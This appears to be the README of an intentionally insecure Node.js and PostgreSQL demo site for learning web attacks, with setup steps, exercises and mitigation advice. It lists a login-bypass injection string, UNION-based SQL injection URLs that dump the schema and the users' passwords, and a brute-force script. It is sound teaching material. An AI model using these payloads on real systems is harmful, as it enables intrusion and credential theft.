Actually, this website is very insecure.
The website is a demostration for some common attacks to web servers.
- Node.js (including
node
runtime andnpm
) - A PostgreSQL Server
- Node.js v6.10.3
- PostgreSQL v9.6.3
-
Create a database on your PostgreSQL server.
-
Run
npm install
in this project directory to install dependencies. -
Configure
config.js
in order to connect to your PostgreSQL database. -
Run
node src/model/schema.js
to initialize your database. -
Run
node src/server.js
to start up your server.
- The web server will be run on port
8080
.
- Enjoy !
Here are the vulnerabilities you can try on this website:
Type in admin' --
as username and anything as password on the login form.
Send a GET request to this URL:
http://127.0.0.1:8080/api/posts?id=-1 UNION SELECT 1, table_name, column_name FROM information_schema.columns WHERE table_schema = 'public';
You can achieve this by simply typing this on the URL bar of your browser.
Send a GET request to this URL:
http://127.0.0.1:8080/api/posts?id=-1 UNION SELECT id, username, password FROM users;
You can achieve this by simply typing this on the URL bar of your browser.
Run node util/brute.js
To prevent SQL injections, you could use Prepared Statements provided by pg-promise.
Prepared statements clearly separate the SQL command and the data. Therefore, it prevents the client inputs become a part of SQL command.
A simple way to prevent brute-force attacks is limit how many times a user can try to login in a given time window. rate-limiter is a good middleware for this job.
- Node.js Security Checklist
- A checklist for developers to prevent security risks on Node.js.
- OWASP Node Goat Project
- An example project for developers to learn how common security risks on Node.js apply to web applications developed using Node.js and how to effectively address them.
- Security Checklist Developers
- A general security checklist for backend developers